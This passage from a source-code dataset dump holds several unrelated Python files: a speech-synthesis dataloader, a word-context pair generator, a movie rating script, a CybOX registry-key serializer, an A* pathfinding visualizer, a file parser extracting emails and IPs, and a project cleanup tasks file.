size=(self.max_seq_len,)).astype(np.int32)\n duration = self._fake_duration(\n self.max_seq_len, self.max_mel_length)\n mel = np.random.rand(self.max_mel_length, self.opts[\"num_mels\"]).astype(\n self.np_dtype)\n pitch = np.random.rand(self.max_seq_len,).astype(self.np_dtype)\n energy = np.random.rand(self.max_seq_len,).astype(self.np_dtype)\n\n yield phoneme, duration, pitch, energy, mel\n\n def _inference_generator(self):\n while True:\n for fn in self.filenames:\n phoneme = np.load(os.path.join(\n self.opts[\"data_path\"], \"phone\", f\"phn-{fn}.npy\")).astype(np.int32)\n yield phoneme\n\n def generator(self):\n while True:\n for fn in self.filenames:\n phoneme, duration, pitch, energy, mel = self._load_data(fn)\n yield phoneme, duration, pitch, energy, mel\n\n def __call__(self):\n \"\"\"Create tf.dataset function.\"\"\"\n tf.random.set_seed(int(self.opts['seed']))\n np.random.seed(int(self.opts['seed']))\n\n output_types = (tf.int32, self.dtype, self.dtype,\n self.dtype, self.dtype)\n padded_shapes = ([self.max_seq_len], [self.max_seq_len], [self.max_seq_len], [\n self.max_seq_len], [self.max_mel_length, self.opts[\"num_mels\"]])\n\n if self.opts[\"generated_data\"]:\n data_gen = self._generated_generator\n else:\n if not self.filenames:\n self._shuffle_files()\n data_gen = self.generator\n\n datasets = tf.data.Dataset.from_generator(\n data_gen, output_types=output_types)\n if self.is_train:\n datasets = datasets.shuffle(\n buffer_size=1000, seed=int(self.opts[\"seed\"]))\n datasets = datasets.padded_batch(\n self.opts[\"batch_size\"], padded_shapes=padded_shapes, drop_remainder=True)\n datasets = datasets.map(lambda phoneme, duration, pitch, energy, melspectrum: (\n (phoneme, duration, pitch, energy), (melspectrum, melspectrum, duration, pitch, energy)))\n datasets = datasets.repeat().prefetch(tf.data.experimental.AUTOTUNE)\n return datasets\n\n def get_inference_data(self):\n \"\"\"Create tf.dataset function.\"\"\"\n tf.random.set_seed(int(self.opts['seed']))\n np.random.seed(int(self.opts['seed']))\n\n output_types = (tf.int32)\n padded_shapes = ([self.max_seq_len])\n\n datasets = tf.data.Dataset.from_generator(\n self._inference_generator, output_types=output_types)\n datasets = datasets.padded_batch(\n self.opts[\"batch_size\"], padded_shapes=padded_shapes, drop_remainder=True)\n datasets = datasets.repeat(1).prefetch(tf.data.experimental.AUTOTUNE)\n return datasets\n\n\nclass LJSpeechCharLevelDataset(object):\n \"\"\"Dataloader for character-level datasets.\"\"\"\n\n def __init__(self, opts, is_train=True):\n self.opts = opts\n self.is_train = is_train\n self.np_dtype = np.float16 if opts[\"precision\"] == \"16\" else np.float32\n self.max_seq_length = opts[\"max_seq_length\"]\n self.max_mel_length = opts[\"max_wave_length\"]\n self.dtype = tf.float16 if opts[\"precision\"] == \"16\" else tf.float32\n self.np_dtype = np.float16 if opts[\"precision\"] == \"16\" else np.float32\n if not self.opts[\"generated_data\"] and self.opts[\"data_path\"]:\n self.utts_path = os.path.join(opts[\"data_path\"], \"train_utt_ids.npy\") if is_train else os.path.join(\n opts[\"data_path\"], \"valid_utt_ids.npy\")\n self.base_path = os.path.join(\n opts[\"data_path\"], \"train\") if is_train else os.path.join(opts[\"data_path\"], \"valid\")\n self.utts_ids = np.load(self.utts_path)\n # stats\n self.f0_stat = np.load(os.path.join(\n opts[\"data_path\"], \"stats_f0.npy\"))\n self.energy_stat = np.load(os.path.join(\n opts[\"data_path\"], \"stats_energy.npy\"))\n self.mel_stat = 
np.load(os.path.join(\n opts[\"data_path\"], \"stats.npy\"))\n self._set_path()\n self._get_length()\n self.same_sample = False\n\n def _set_path(self):\n self.duration_path = os.path.join(self.base_path, \"duration\")\n self.id_path = os.path.join(self.base_path, \"ids\")\n self.mel_path = os.path.join(self.base_path, \"norm-feats\")\n self.f0_path = os.path.join(self.base_path, \"raw-f0\")\n self.energy_path = os.path.join(self.base_path, \"raw-energies\")\n\n def _get_length(self):\n with open(os.path.join(self.opts[\"data_path\"], \"length.json\"), \"r\") as f:\n length = json.load(f)\n self.max_seq_length = length[\"max_seq_length\"]\n self.max_mel_length = length[\"max_mel_length\"]\n\n def __len__(self):\n return len(self.utts_ids)\n\n def _load_data(self, utt_id):\n input_id = np.load(os.path.join(\n self.id_path, f\"{utt_id}-ids.npy\")).astype(np.int32)\n f0 = np.load(os.path.join(\n self.f0_path, f\"{utt_id}-raw-f0.npy\")).astype(self.np_dtype)\n energy = np.load(os.path.join(self.energy_path,\n f\"{utt_id}-raw-energy.npy\")).astype(self.np_dtype)\n duration = np.load(os.path.join(self.duration_path,\n f\"{utt_id}-durations.npy\")).astype(self.np_dtype)\n mel = np.load(os.path.join(\n self.mel_path, f\"{utt_id}-norm-feats.npy\")).astype(self.np_dtype)\n\n assert len(f0) == len(energy) == mel.shape[0], \\\n f\"[{utt_id}]Shape mismatch!(f0({f0.shape}), energy({energy.shape}) and mel({mel.shape[0]})\"\n assert sum(duration) == mel.shape[0], \\\n f\"[{utt_id}]Sum of duration({sum(duration)}) is not equal to mel.shape[0]({mel.shape[0]}).\"\n\n f0 = self._norm_mean_std(f0, self.f0_stat[0], self.f0_stat[1])\n energy = self._norm_mean_std(\n energy, self.energy_stat[0], self.energy_stat[1]\n )\n\n # calculate charactor f0/energy\n f0 = average_by_duration(f0, duration)\n energy = average_by_duration(energy, duration)\n return input_id, duration, f0, energy, mel\n\n def _norm_mean_std(self, x, mean, std):\n zero_idxs = np.where(x == 0.0)[0]\n x = (x - mean) / std\n x[zero_idxs] = 0.0\n return x\n\n def _fake_duration(self, phn_len, mel_len):\n # duration will be padded during loading.\n dur = [mel_len//phn_len]*(phn_len-1)\n balance = sum(dur) - mel_len\n dur[-1] += balance\n return np.array(dur).astype(np.int32)\n\n def _generated_generator(self):\n while True:\n input_id = np.random.randint(0, self.max_seq_length,\n size=(self.max_seq_length,)).astype(np.int32)\n duration = self._fake_duration(\n self.max_seq_length, self.max_mel_length)\n mel = np.random.rand(self.max_mel_length,\n self.opts[\"num_mels\"]).astype(self.np_dtype)\n f0 = np.random.rand(self.max_seq_length,).astype(self.np_dtype)\n energy = np.random.rand(self.max_seq_length,).astype(self.np_dtype)\n yield input_id, duration, f0, energy, mel\n\n def _inference_generator(self):\n for utt_id in self.utts_ids:\n input_id = np.load(os.path.join(\n self.id_path, f\"{utt_id}-ids.npy\")).astype(np.int32)\n yield input_id\n\n def generator(self):\n if self.same_sample:\n uid = self.utts_ids[0]\n input_id, duration, f0, energy, mel = self._load_data(uid)\n while True:\n logger.info(\n f\"[Same samples({uid})]uid={uid}, id_gt.shape={input_id.shape}, duration_gt.shape={duration.shape}, f0_gt.shape={f0.shape}, mel_gt.shape={mel.shape}, sum_duration={np.sum(duration)}\")\n yield input_id, duration, f0, energy, mel\n else:\n while True:\n for uid in self.utts_ids:\n try:\n input_id, duration, f0, energy, mel = self._load_data(\n uid)\n yield input_id, duration, f0, energy, mel\n except AssertionError:\n pass\n\n def 
get_one_samples(self):\n uid = np.random.choice(self.utts_ids)\n input_id, duration, f0, energy, mel = self._load_data(uid)\n return uid, input_id, duration, f0, energy, mel\n\n def get_inference_data(self):\n \"\"\"Create tf.dataset function.\"\"\"\n tf.random.set_seed(int(self.opts['seed']))\n np.random.seed(int(self.opts['seed']))\n\n output_types = (tf.int32)\n padded_shapes = ([self.max_seq_length])\n\n datasets = tf.data.Dataset.from_generator(\n self._inference_generator, output_types=output_types)\n datasets = datasets.padded_batch(\n self.opts[\"batch_size\"], padded_shapes=padded_shapes, drop_remainder=True)\n datasets = datasets.repeat(1).prefetch(tf.data.experimental.AUTOTUNE)\n return datasets\n\n def __call__(self):\n \"\"\"Create tf.dataset function.\"\"\"\n tf.random.set_seed(int(self.opts['seed']))\n np.random.seed(int(self.opts['seed']))\n\n output_types = (tf.int32, self.dtype, self.dtype,\n self.dtype, self.dtype)\n padded_shapes = ([self.max_seq_length], [self.max_seq_length], [self.max_seq_length], [\n self.max_seq_length], [self.max_mel_length, self.opts[\"num_mels\"]])\n\n if self.opts[\"generated_data\"] or not self.opts[\"data_path\"]:\n data_gen = self._generated_generator\n else:\n data_gen = self.generator\n\n datasets = tf.data.Dataset.from_generator(\n data_gen, output_types=output_types)\n if self.is_train:\n datasets = datasets.shuffle(\n buffer_size=1000, seed=int(self.opts[\"seed\"]))\n datasets = datasets.padded_batch(\n self.opts[\"batch_size\"], padded_shapes=padded_shapes, drop_remainder=True)\n\n datasets = datasets.map(lambda input_id, duration, pitch, energy, melspectrum: (\n (input_id, duration, pitch, energy), (melspectrum, melspectrum, duration, pitch, energy)))\n\n datasets = datasets.repeat().prefetch(tf.data.experimental.AUTOTUNE)\n return datasets\n\n\nif __name__ == \"__main__\":\n from options import make_global_options\n opts = make_global_options([])\n train_datasets = LJSpeechCharLevelDataset(opts, is_train=True)\n val_datasets = LJSpeechCharLevelDataset(opts, is_train=False)\n print(\n f\"Train datasets: {len(train_datasets)}, Valid datasets: {len(val_datasets)}\")\n traindata = train_datasets()\n valdata = val_datasets()\n (input_id, duration, f0, energy, mel), y = next(iter(traindata))\n print(\"******* Train datasets:\")\n print(f\"input_id: shape={input_id.shape}, dtype={input_id.dtype}\")\n print(f\"duration: shape={duration.shape}, dtype={duration.dtype}\")\n print(f\"f0: shape={f0.shape}, dtype={f0.dtype}\")\n print(f\"energy: shape={energy.shape}, dtype={energy.dtype}\")\n print(f\"mel: shape={mel.shape}, dtype={mel.dtype}\")\n","sub_path":"applications/tensorflow2/fastspeech2/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":15103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"28637447","text":"# 81で作成したコーパス中に出現するすべての単語tに関して,単語tと文脈語cのペアをタブ区切り形式ですべて書き出せ.ただし,文脈語の定義は次の通りとする.\n\n# ある単語tの前後d単語を文脈語cとして抽出する(ただし,文脈語に単語tそのものは含まない)\n# 単語tを選ぶ度に,文脈幅dは{1,2,3,4,5}の範囲でランダムに決める.\n\nimport random\nfrom tqdm import tqdm\n\n\nwith open('./knock81.txt', 'r') as fin, \\\n open('./knock82.txt', 'w+') as fo:\n\n for line in tqdm(fin):\n words = line.split()\n for i, t in enumerate(words):\n d = random.randrange(1, 6) # {1,2,3,4,5}\n pre = words[max(i-d, 0):i]\n post = words[i+1: i+1+d]\n\n for c in pre+post:\n print(f'{t}\\t{c}', 
file=fo)\n","sub_path":"naomi/chapter09/knock82.py","file_name":"knock82.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"91035370","text":"import pandas as pd\n\nmetadata = pd.read_csv('/Users/sidverma/Documents/Projects/MovieRecommenderSystems/data/movies_metadata.csv',\n low_memory= False)\nC = metadata['vote_average'].mean() #C is the mean weight across the whole report\nm = metadata['vote_count'].quantile(0.90) #m is the minimum number of votes that top 10% of the rated movies got\n#we need the C and m to scale the metric('Rating') of the movies\n\nq_movies = metadata.copy().loc[metadata['vote_count'] >= m]\n#q_movies is a new dataframe that contains all the movies which have the number of votes >= m\n#we use .copy() method such that q_movies dataset is independent of metadata dataset\n#i.e any changes made to either of the dataset will not be reflected in other\nq_movies.shape\n\n#making the function which gives the weighted rating of the movies\ndef weighted_rating (x, m = m, C = C):\n v = x['vote_count']\n R = x['vote_average']\n\n return (v/(v+m) * R) + (m/(m+v) * C)\n\n#making another feature in the q_movies to include the weighted average\n\nq_movies['score'] = q_movies.apply(weighted_rating, axis = 1)\nq_movies.sort_values('score',ascending= False)\n","sub_path":"IMDb-Top15.py","file_name":"IMDb-Top15.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"492903423","text":"import socket\nimport sys\nimport numpy as np\nfrom dating.utils import floats_to_msg4\n\n\nPORT = int(sys.argv[1])\n\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect(('localhost', PORT))\n\nnum_string = sock.recv(4)\nassert num_string.endswith('\\n')\n\nnum_attr = int(num_string[:-1])\n\nprint('20 Initial candidate scores and attributes:')\nfor i in range(20):\n # score digits + binary labels + commas + exclamation\n data = sock.recv(8 + 2*num_attr)\n print('Score = %s' % data[:8])\n assert data[-1] == '\\n'\n\nfor i in range(20):\n #Guess Weights\n guess_weights = np.random.random(num_attr) \n sock.sendall(floats_to_msg4(guess_weights))\n\n print(\"Sending guess: \"+ floats_to_msg4(guess_weights))\n data = sock.recv(8)\n assert data[-1] == '\\n'\n score = float(data[:-1])\n print('Received a score = %f for i = %d ' % (score, i))\n\nsock.close()\n","sub_path":"python2/test_matchmaker.py","file_name":"test_matchmaker.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"617378708","text":"import cybox.utils as utils\nimport cybox.bindings.cybox_common_types_1_0 as common_types_binding\nimport cybox.bindings.win_registry_key_object_1_3 as win_registry_key_binding\nfrom cybox.common.baseobjectattribute import Base_Object_Attribute\nfrom cybox.common.byterun import ByteRuns\nfrom cybox.objects.win_handle_object import Win_Handle_List\n\nclass Registry_Key:\n def __init__(self):\n pass\n \n @classmethod\n def object_from_dict(cls, registry_key_dict):\n \"\"\"Create the Win Registry Key Object object representation from an input dictionary\"\"\"\n registry_key_obj = win_registry_key_binding.WindowsRegistryKeyObjectType()\n registry_key_obj.set_anyAttributes_({'xsi:type' : 'WinRegistryKeyObj:WindowsRegistryKeyObjectType'})\n registry_value = win_registry_key_binding.RegistryValueType()\n\n for key, value 
in registry_key_dict.items():\n if key == 'hive' and utils.test_value(value):\n registry_key_obj.set_Hive(Base_Object_Attribute.object_from_dict(common_types_binding.StringObjectAttributeType(datatype='String'), value))\n elif key == 'key' and utils.test_value(value):\n registry_key_obj.set_Key(Base_Object_Attribute.object_from_dict(common_types_binding.StringObjectAttributeType(datatype='String'), value))\n elif key == 'number_values' and utils.test_value(value):\n registry_key_obj.set_Number_Values(Base_Object_Attribute.object_from_dict(common_types_binding.UnsignedIntegerObjectAttributeType(datatype='UnsignedInteger'), value))\n elif key == 'values' :\n registry_values_obj = win_registry_key_binding.RegistryValuesType()\n for registry_value_dict in value:\n registry_value_obj = cls.__registry_value_object_from_dict(registry_value_dict)\n if registry_value_obj.hasContent_() : registry_values_obj.add_Value(registry_value_obj)\n if registry_values_obj.hasContent_() : registry_key_obj.set_Values(registry_values_obj)\n elif key == 'modified_time' and utils.test_value(value):\n registry_key_obj.set_Modified_Time(Base_Object_Attribute.object_from_dict(common_types_binding.DateTimeObjectAttributeType(datatype='DateTime'), value))\n elif key == 'creator_username' and utils.test_value(value):\n registry_key_obj.set_Creator_Username(Base_Object_Attribute.object_from_dict(common_types_binding.StringObjectAttributeType(datatype='String'), value)) \n elif key == 'handle_list':\n registry_key_obj.set_Handle_List(Win_Handle_List.object_from_dict(value))\n elif key == 'number_subkeys' and utils.test_value(value):\n registry_key_obj.set_Number_Subkeys(Base_Object_Attribute.object_from_dict(common_types_binding.UnsignedIntegerObjectAttributeType(datatype='UnsignedInteger'), value)) \n elif key == 'subkeys' :\n subkeys_obj = win_registry_key_binding.RegistrySubkeysType()\n for sub_registry_key_dict in value:\n sub_registry_key_obj = cls.object_from_dict(sub_registry_key_dict)\n if sub_registry_key_obj.hasContent_() : subkeys_obj.add_Subkey(sub_registry_key_obj)\n if subkeys_obj.hasContent_() : registry_key_obj.set_Subkeys(subkeys_obj)\n elif key == 'byte_runs' : \n registry_key_obj.set_Byte_Runs(ByteRuns.object_from_dict(value))\n return registry_key_obj\n\n @classmethod\n def dict_from_object(cls, registry_key_obj):\n \"\"\"Parse and return a dictionary for a Win Registry Key Object object\"\"\" \n registry_key_dict = {}\n if registry_key_obj.get_Key() is not None: registry_key_dict['key'] = Base_Object_Attribute.dict_from_object(registry_key_obj.get_Key())\n if registry_key_obj.get_Hive() is not None: registry_key_dict['hive'] = Base_Object_Attribute.dict_from_object(registry_key_obj.get_Hive())\n if registry_key_obj.get_Number_Values() is not None: registry_key_dict['number_values'] = Base_Object_Attribute.dict_from_object(registry_key_obj.get_Number_Values())\n if registry_key_obj.get_Values() is not None: registry_key_dict['values'] = cls.__registry_value_dict_from_object(registry_key_obj.get_Values())\n if registry_key_obj.get_Modified_Time() is not None: registry_key_dict['modified_time'] = Base_Object_Attribute.dict_from_object(registry_key_obj.get_Modified_Time())\n if registry_key_obj.get_Creator_Username() is not None: registry_key_dict['creator_username'] = Base_Object_Attribute.dict_from_object(registry_key_obj.get_Creator_Username())\n if registry_key_obj.get_Handle_List() is not None: registry_key_dict['handle_list'] = Win_Handle_List.dict_from_object(registry_key_obj.get_Handle_List())\n if 
registry_key_obj.get_Number_Subkeys() is not None: registry_key_dict['number_subkeys'] = Base_Object_Attribute.dict_from_object(registry_key_obj.get_Number_Subkeys())\n        if registry_key_obj.get_Subkeys() is not None:\n            subkeys_list = []\n            for subkey_obj in registry_key_obj.get_Subkeys().get_Subkey():\n                subkey_dict = cls.dict_from_object(subkey_obj)\n                subkeys_list.append(subkey_dict)\n            registry_key_dict['subkeys'] = subkeys_list\n        if registry_key_obj.get_Byte_Runs() is not None: registry_key_dict['byte_runs'] = ByteRuns.dict_from_object(registry_key_obj.get_Byte_Runs())\n        return registry_key_dict\n\n    @classmethod\n    def __registry_value_object_from_dict(cls, registry_value_dict):\n        registry_value_obj = win_registry_key_binding.RegistryValueType()\n        for key, value in registry_value_dict.items():\n            if key == 'name' and utils.test_value(value):\n                registry_value_obj.set_Name(Base_Object_Attribute.object_from_dict(common_types_binding.StringObjectAttributeType(datatype='String'),value))\n            elif key == 'data' and utils.test_value(value):\n                registry_value_obj.set_Data(Base_Object_Attribute.object_from_dict(common_types_binding.StringObjectAttributeType(datatype='String'),value))\n            elif key == 'datatype' and utils.test_value(value):\n                registry_value_obj.set_Datatype(Base_Object_Attribute.object_from_dict(common_types_binding.StringObjectAttributeType(datatype='String'),value))\n            elif key == 'byte_runs' : registry_value_obj.set_Byte_Runs(ByteRuns.object_from_dict(value))\n        return registry_value_obj\n\n    @classmethod\n    def __registry_value_dict_from_object(cls, registry_value_obj):\n        registry_value_dict = {}\n        if registry_value_obj.get_Name() is not None: registry_value_dict['name'] = Base_Object_Attribute.dict_from_object(registry_value_obj.get_Name())\n        if registry_value_obj.get_Data() is not None: registry_value_dict['data'] = Base_Object_Attribute.dict_from_object(registry_value_obj.get_Data())\n        if registry_value_obj.get_Datatype() is not None: registry_value_dict['datatype'] = Base_Object_Attribute.dict_from_object(registry_value_obj.get_Datatype())\n        if registry_value_obj.get_Byte_Runs() is not None: registry_value_dict['byte_runs'] = ByteRuns.dict_from_object(registry_value_obj.get_Byte_Runs())\n        return registry_value_dict","sub_path":"cybox/objects/registry_object.py","file_name":"registry_object.py","file_ext":"py","file_size_in_byte":7318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"157433357","text":"import pygame\nimport time\nfrom button import button\nfrom aStar import main\nBLUE=[106,159,181]\nRED=[255,0,0]\nc=(230, 230, 255)\nROW=25\nCOL=60\n\ndef displayMessage(msg,window):\n\tSetdst=button(BLUE,0,501,1200,100,msg)\n\tSetdst.draw(window)\n\tpygame.display.update()\ndef changeColor(newsrc,src,color):\n\tif not src:\n\t\tsrc=newsrc\n\t\tpygame.draw.rect(window,color,(src[0]*20+2,src[1]*20+2,18,18))\n\t\tpygame.display.update()\n\t\treturn\n\tpygame.draw.rect(window,(255,255,255),(src[0]*20+2,src[1]*20+2,18,18))\n\tsrc=newsrc\n\tpygame.draw.rect(window,color,(src[0]*20+2,src[1]*20+2,18,18))\n\tpygame.display.update()\ndef createHurdles(h,grid,ar):\n\tif ar==1:\n\t\tpygame.draw.rect(window,(0,0,0),(h[0]*20+2,h[1]*20+2,18,18))\n\t\tgrid[h[1]][h[0]]=0\n\t\tpygame.display.update()\n\telse:\n\t\tpygame.draw.rect(window,(255,255,255),(h[0]*20+2,h[1]*20+2,18,18))\n\t\tgrid[h[1]][h[0]]=1\n\t\tpygame.display.update()\npygame.init()\nwindow = pygame.display.set_mode((1200,600))\npygame.display.set_caption(\"A* 
Visualization\")\n\nwindow.fill((255,255,255))\npygame.display.update()\npygame.display.flip()\ndef index():\n\twindow.fill((255,255,255))\n\tdisplayMessage(\"select a cell for start.... press F after selection\",window)\n\tfor x in range(0,501,20):\n\t\tpygame.draw.line(window,c,(0,x),(1200,x),2)\n\t\tpygame.display.update()\n\tfor y in range(0,1201,20):\n\t\tpygame.draw.line(window,c,(y,0),(y,500),2)\n\t\tpygame.display.update()\n\tdst=None\n\tsrc=None\n\trun=True\n\twhile run:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type==pygame.MOUSEBUTTONDOWN and event.button == 1:\n\t\t\t\tfollow=True\n\t\t\t\twhile follow:\n\t\t\t\t\tpos=pygame.mouse.get_pos()\n\t\t\t\t\tif pos[0]>=0 and pos[0]=0 and pos[1]=0 and pos[0]=0 and pos[1]=0 and pos[0]=0 and pos[1]\n\nEveryone is permitted to copy and distribute verbatim or modified\ncopies of this license document, and changing it is allowed as long\nas the name is changed.\n\n DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\n TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n 0. You just DO WHAT THE FUCK YOU WANT TO.\n\n'''\n\nimport argparse\n\n#iso8859_replacement = u\"ÀÁÂÃÄŰÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞß\"\n#russian_alphabet = u\"АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ\"\n#reps = {'А':'À', 'Б':'Á', 'В':'Â', 'Г':'Ã', 'Д':'Ä', 'Е':'Å', 'Ё':'°', 'Ж':'Æ', 'З':'Ç', 'И':'È', 'Й':'É', 'К':'Ê', 'Л':'Ë', 'М':'Ì', 'Н':'Í', 'О':'Î', 'П':'Ï', 'Р':'Ð', 'С':'Ñ', 'Т':'Ò', 'У':'Ó', 'Ф':'Ô', 'Х':'Õ', 'Ц':'Ö', 'Ч':'×', 'Ш':'Ø', 'Щ':'Ù', 'Ъ':'Ú', 'Ы':'Û', 'Ь':'Ü', 'Э':'Ý', 'Ю':'Þ', 'Я':'ß'}\n\ndictionary = {u'А':u'À', u'Б':u'Á', u'В':u'Â', u'Г':u'Ã', u'Д':u'Ä', u'Е':u'Å',\n u'Ё':u'°', u'Ж':u'Æ', u'З':u'Ç', u'И':u'È', u'Й':u'É', u'К':u'Ê',\n u'Л':u'Ë', u'М':u'Ì', u'Н':u'Í', u'О':u'Î', u'П':u'Ï', u'Р':u'Ð',\n u'С':u'Ñ', u'Т':u'Ò', u'У':u'Ó', u'Ф':u'Ô', u'Х':u'Õ', u'Ц':u'Ö',\n u'Ч':u'×', u'Ш':u'Ø', u'Щ':u'Ù', u'Ъ':u'Ú', u'Ы':u'Û', u'Ь':u'Ü',\n u'Э':u'Ý', u'Ю':u'Þ', u'Я':u'ß',\n u'а':u'à', u'б':u'á', u'в':u'â', u'г':u'ã', u'д':u'ä', u'е':u'å',\n u'ё':u'±', u'ж':u'æ', u'з':u'ç', u'и':u'è', u'й':u'é', u'к':u'ê',\n u'л':u'ë', u'м':u'ì', u'н':u'í', u'о':u'î', u'п':u'ï', u'р':u'ð',\n u'с':u'ñ', u'т':u'ò', u'у':u'ó', u'ф':u'ô', u'х':u'õ', u'ц':u'ö',\n u'ч':u'÷', u'ш':u'ø', u'щ':u'ù', u'ъ':u'ú', u'ы':u'û', u'ь':u'ü',\n u'э':u'ý', u'ю':u'þ', u'я':u'ÿ'}\n\ndef replace_all(text, dic):\n for i, j in dic.iteritems():\n text = text.replace(i, j)\n return text\n\n# Pre-part l_ mean that variable is mine\n\nl_Parser = argparse.ArgumentParser()\nl_Parser.add_argument(\"input_file\")\nl_Args = l_Parser.parse_args()\n\nl_File_In = open(l_Args.input_file)\nl_File_Out = open(\"base-language.txt.custom\", \"w\")\n\nl_File_Out.write(\"\\xef\\xbb\\xbf\\r\\n\")\n\nfor entry in l_File_In:\n #for i, j in dictionary.iteritems():\n # entry = entry.decode(\"utf-8\").replace(i, j)\n l_File_Out.write(replace_all(entry.decode(\"utf-8\"), dictionary).encode(\"utf-8\"))\n\nl_File_In.close()\nl_File_Out.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"native2custom.py","file_name":"native2custom.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"150349716","text":"from ControlLayer.PDFReader import *\nfrom ControlLayer.RegexChecker import *\nfrom ControlLayer.PCAPReader import *\nfrom ControlLayer.TxtReader import *\nfrom ControlLayer.CsvReader import *\nfrom ControlLayer.ImgReader import *\nfrom ModelLayer.Identifier import *\n\nclass FileParser: #Might want to refactor this class, as there is 
a lot of repeated code.\n\n def ParsePDF(self, paths):\n id = 0 #Id gets incremented when searching for identifiers and attached to them\n identifiers = []\n pdfReader = PdfReader()\n regex = RegexChecker()\n for path in paths:\n textDict = pdfReader.readImages(path) #Gets all normal text and text on images from PDF\n for page in textDict:\n \n emails = regex.checkMail(textDict[page]) #Find all emails using RegEx\n for email in emails:\n ident = Identifier(email, \"Email\", path, page, id)\n identifiers.append(ident) #Add email identifiers to list\n id +=1\n \n phoneNumbers = regex.checkPhone(textDict[page]) #Find all danish phone numbers using RegEx\n for number in phoneNumbers:\n ident = Identifier(number, \"PhoneNumber\", path, page, id)\n identifiers.append(ident) #Add phone number identifiers to list\n id +=1\n\n ips = regex.findIP(textDict[page]) #Find all IPv4 and IPv6 addresses using RegEx\n for ip in ips:\n ident = Identifier(number, \"IP\", path, page, id)\n identifiers.append(ident) #Add IP address identifiers to list\n id +=1\n\n return identifiers\n \n def ParseImg(self, paths):\n id = 0\n identifiers = []\n imRead = ImgReader()\n regex = RegexChecker()\n for path in paths:\n img = imRead.ReadFile(path)\n emails = regex.checkMail(img)\n for email in emails:\n ident = Identifier(email, \"Email\", path, 0, id)\n identifiers.append(ident)\n id+=1\n\n phoneNumbers = regex.checkPhone(img)\n for number in phoneNumbers:\n ident = Identifier(number, \"Telefon Nr.\", path, 0, id)\n identifiers.append(ident)\n id+=1\n\n ips = regex.findIP(img)\n for ip in ips:\n ident = Identifier(ip, \"IP-adresse\", path, 0, id)\n identifiers.append(ident)\n id+=1\n return identifiers\n\n def ParseCsv(self, paths):\n id = 0\n identifiers = []\n csvReader = CsvReader()\n regex = RegexChecker()\n for path in paths:\n csvRows = csvReader.ReadFile(path)\n for row in csvRows:\n #Search for email\n emails = regex.checkMail(str(row))\n for email in emails:\n ident = Identifier(email, \"Email\", path, 0, id)\n identifiers.append(ident)\n id+=1\n #Search for phone numbers\n phoneNumbers = regex.checkPhone(str(row))\n for number in phoneNumbers:\n ident = Identifier(number, \"Telefon Nr.\", path, 0, id)\n identifiers.append(ident)\n id+=1\n #Search for IP addresses\n ips = regex.findIP(str(row))\n for ip in ips:\n ident = Identifier(ip, \"IP-adresse\", path, 0, id)\n identifiers.append(ident)\n ip+=1\n return identifiers\n\n \n def ParseTxt(self, paths):\n id = 0\n identifiers = []\n txtReader = TxtReader()\n regex = RegexChecker()\n for path in paths:\n data = txtReader.ReadFile(path)\n emails = regex.checkMail(data)\n for email in emails:\n ident = Identifier(email, \"Email\", path, 0, id)\n identifiers.append(ident)\n id+=1\n\n phoneNumbers = regex.checkPhone(data)\n for number in phoneNumbers:\n ident = Identifier(number, \"Telefon Nr.\", path, 0, id)\n identifiers.append(ident)\n id+=1\n\n ips = regex.findIP(data)\n for ip in ips:\n ident = Identifier(ip, \"IP-adresse\", path, 0, id)\n identifiers.append(ident)\n id+=1\n\n return identifiers\n \n def ParsePcap(self, paths):\n id = 0\n identifiers = []\n pcapReader = PCAPReader()\n for path in paths:\n ips = pcapReader.ReadFile(path)\n for ip in ips:\n ident = Identifier(ip, \"IP\", path, 0, id)\n identifiers.append(ident)\n id+=1\n \n return identifiers\n\n 
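# A possible consolidation of the repeated email/phone/IP scanning that the\n    # comment at the top of this class asks for -- a sketch only: it reuses the\n    # RegexChecker and Identifier calls seen in the methods above and is not yet\n    # wired into the parsers; the \"PhoneNumber\"/\"IP\" labels follow ParsePDF.\n    def _scan_text(self, text, path, page, start_id):\n        regex = RegexChecker()\n        identifiers = []\n        ident_id = start_id\n        for check, label in ((regex.checkMail, \"Email\"),\n                             (regex.checkPhone, \"PhoneNumber\"),\n                             (regex.findIP, \"IP\")):\n            for match in check(text):\n                identifiers.append(Identifier(match, label, path, page, ident_id))\n                ident_id += 1\n        return identifiers, ident_id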
\n","sub_path":"WoddenLegs/ControlLayer/FileParser.py","file_name":"FileParser.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"335788866","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport subprocess\nfrom datetime import datetime\n\nimport six\nfrom invoke import task\n\nroot = os.path.dirname(os.path.abspath(__file__))\npackage_name = \"plum_tools\"\n\n\ndef covert_source(source):\n source = source.replace(\"/\", \".\")\n if source.endswith(\".py\"):\n source = source[:-3]\n return source\n\n\n@task\ndef clean(ctx):\n \"\"\"清除项目中无效文件\"\"\"\n ctx.run(\"rm -rf build dist\", echo=True)\n ctx.run(\"find . -name '*.pyc' -exec rm -f {} +\", echo=True)\n ctx.run(\"find . -name '*.pyo' -exec rm -f {} +\", echo=True)\n ctx.run(\"find . -name '*.log' -exec rm -f {} +\", echo=True)\n ctx.run(\"find . -name '__pycache__' -exec rm -rf {} +\", echo=True)\n ctx.run(\"find . -name 